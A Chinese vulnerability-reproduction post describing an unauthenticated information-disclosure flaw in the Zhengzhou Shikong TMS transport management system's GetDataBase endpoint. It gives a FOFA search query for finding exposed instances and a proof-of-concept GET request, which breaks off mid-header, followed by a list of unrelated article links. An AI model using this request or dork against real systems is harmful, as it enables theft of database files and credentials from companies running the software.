当前位置: 首页 > article >正文

郑州时空-TMS运输管理系统 GetDataBase 信息泄露漏洞复现

0x01 产品简介

郑州时空-TMS运输管理系统是一款专为物流运输企业设计的综合性管理软件,旨在提高运输效率、降低运输成本,并实现供应链的协同运作。系统基于现代计算机技术和物流管理方法,结合了郑州时空公司的专业经验和技术优势,为物流运输企业提供了一套高效、智能的运输管理解决方案。该系统支持多网点、多机构、多功能作业,能够全面满足企业的运输管理需求。适用于各类物流运输企业,包括运输公司、各企业下面的运输队等,特别适用于需要高效管理运输过程、降低运输成本并提升供应链效率的企业。

0x02 漏洞概述

郑州时空-TMS运输管理系统 GetDataBase 接口存在信息泄露漏洞,未经身份验证攻击者可通过该漏洞读取系统内部数据库文件,泄露账号密码等重要凭证,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="/Images/ManLogin/name.png"

0x04 漏洞复现

PoC

GET /ManLogin/GetDataBase HTTP/1.1
Host: 
User-

http://www.kler.cn/a/460411.html

相关文章:

  • 设计模式の状态策略责任链模式
  • 碰一碰拓客系统:创新引领智能拓客新纪元
  • STM32拓展 低功耗案例1:睡眠模式 (register)
  • 常见硬件及其对应的驱动模块列表
  • TypeScript 后端开发中的热重载编译处理
  • WPF编程excel表格操作
  • 深信服云桌面系统的终端安全准入设置
  • JavaWeb开发(三)Servlet技术-手动、自动创建Servlet
  • Elasticsearch-搜索推荐:Suggest
  • 记一次 .NET某汗液测试机系统 崩溃分析
  • HTML5 开关(Toggle Switch)详细讲解
  • 如何将联系人从 iPhone 转移到华为 [4 种方法]
  • 【SQLi_Labs】Basic Challenges
  • 网络游戏之害
  • 智能工厂的设计软件 应用场景的一个例子:为AI聊天工具添加一个知识系统 之9 重新开始 之2
  • 半导体数据分析: 玩转WM-811K Wafermap 数据集(一) AI 机器学习
  • 机器学习DAY9:聚类(K-means、近邻传播算法、谱聚类、凝聚聚类、兰德指数、调整互信息、V−mearure、轮廓系数)
  • Python爬虫入门实例:Python7个爬虫小案例(附源码)
  • 解锁节日季应用广告变现潜力,提升应用广告收入
  • Flink读写Kafka(DataStream API)
  • springboot523基于Spring Boot的大学校园生活信息平台的设计与实现(论文+源码)_kaic
  • 【数据库系统概念】期末复习笔记
  • Spring MVC (下)小项目实战
  • SD卡恢复数据:快速找回丢失文件!
  • ABP框架8——仓储的作用及其基础Demo
  • 单片机实物成品-009 温度控制系统水温控制系统